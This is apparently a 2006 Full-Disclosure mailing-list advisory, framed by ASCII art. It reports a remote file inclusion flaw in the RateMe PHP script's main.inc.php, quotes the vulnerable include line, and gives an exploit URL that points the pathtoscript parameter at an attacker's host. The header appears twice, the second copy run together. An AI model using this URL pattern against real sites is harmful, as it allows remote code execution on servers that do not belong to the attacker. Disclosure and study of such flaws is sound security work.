+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ ;;ii,,::
+
:::: :: ;;tt;;::
+ ;;:: ..,,:: ;;ii,,::
+ ,,,,
ii;;,, ii;;:: ;;ii,,::
+ ii:: tt;;,, ..tt;;,,.. ;;ii;;::
+ ii,,:: ttii,, ..ff;;;;::
;;ii;;::
+ tt;;::..,, tt;;,, ff;;;;ii ;;ii,,::
+ tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,::
+
tt;;;;,, tt;;,,.. tt;;;; ;;ii;;::
+ ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,::
+ ..::,,ii;;;;.. tt;;,,.. iiii,,::
;;ii,,::
+ ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,::
+ ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;::
+ ;;;;:: tt;;::
tt;;;;.. ff;;:: ;;tt,,..
+ ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,..
+ ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;..
+ tt;;::::
::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,..
+ jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,..
+ ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;..
+
...;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,..
+ iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;;
+ ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;::
;;ii,,
+ jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,,
+ jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii::
+ iijjjjjjtt;;
;;ffffjjjjtt:: ;;ii
+ ;;..
ii;;
+ ..
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#########################################################################################################
# Affected Script: RateMe
# Exploit name : RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
# Author: Al7ejaz Hacker
# Website: http://www.planetluc.com/en/ not free version
# Discovered: 15/12/2006
# Conatact : saudi[at]hotmail.fr - & - al7ejaz.hackerz[at]gmail.com
#########################################################################################################
#########################################################################################################
#
# Description :
# File infected : main.inc.php , line 17
#
# echo "\n<!-- Start RateMe v$version output -->\n\n<link href='' rel='stylesheet' type='text/css'>\n<div class='votingtxt'>";
# include($pathtoscript.'db_connect.inc.php'); # <==
#
# Exploit : http://victime/path/main.inc.php?pathtoscript=http://Atacke
#
########################################################################################################
@
@
@W
,#WW
,@WW
, ,W WWW
W, ,:W WWW
,W* @W+ WWW
WWW WWWW WWW
WWW , WWWW WWW
,:W WWW WWWW WWW
,*WW WWW WWW, WWW
, .WWW WWW, WWW WWW
, WWW@ ,WW, , WW# WWW
, WW W ,WW* WWW WWW
,#WW W, WWW WWW, WWW
,WW,WW WWW WWW, WWW
, *WW WW WWW WWW, WWW
*, WW WW WWW WWW WWW
, , WW,,WW WWW WWW WWW
W ,WWW WW. WWW WWW, WWW
W WW WW, #WWW #WW WWW
W WW WW: @WWW WW. WWW
W W@ WWW ,W:WW. WW* WWW
WW *W , WWW, WW WWW, WW. WWW
:@ WW WWW WWW WWW@, WW WWW
, W* , ,WW WWW, WWW @WWW@ ,WWW WWW
,,WW,,, W# WWWWWW#WWWW. WWWWWWWWWW: ,WWW
*WW, WW, ,WWWWWWWWWW :WWWWWWWWW WWW
WWWWWW :WWWWWWWW ,@WWWWWWW WWW
,,WWWW WWWWW,, , WWWW# WW@
W@
@
#########################################################################################################
# Affected Script: RateMe
# Exploit name : RateMe <= all versions => ( main.inc.php ) Remote File
Include Vulnerability
# Author: Al7ejaz Hacker # Website: http://www.planetluc.com/en/ not free version # Discovered: 15/12/2006 # Conatact : saudi[at]hotmail.fr - & - al7ejaz.hackerz[at]gmail.com ######################################################################################################### ######################################################################################################### # # Description : # File infected : main.inc.php , line 17 ## echo "\n<!-- Start RateMe v$version output -->\n\n<link href='".$pathtoscript."style.css' rel='stylesheet' type='text/css'>\n<div class='votingtxt'>";
# include($pathtoscript.'db_connect.inc.php'); # <== # # Exploit : http://victime/path/main.inc.php?pathtoscript=http://Atacke # ########################################################################################################
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
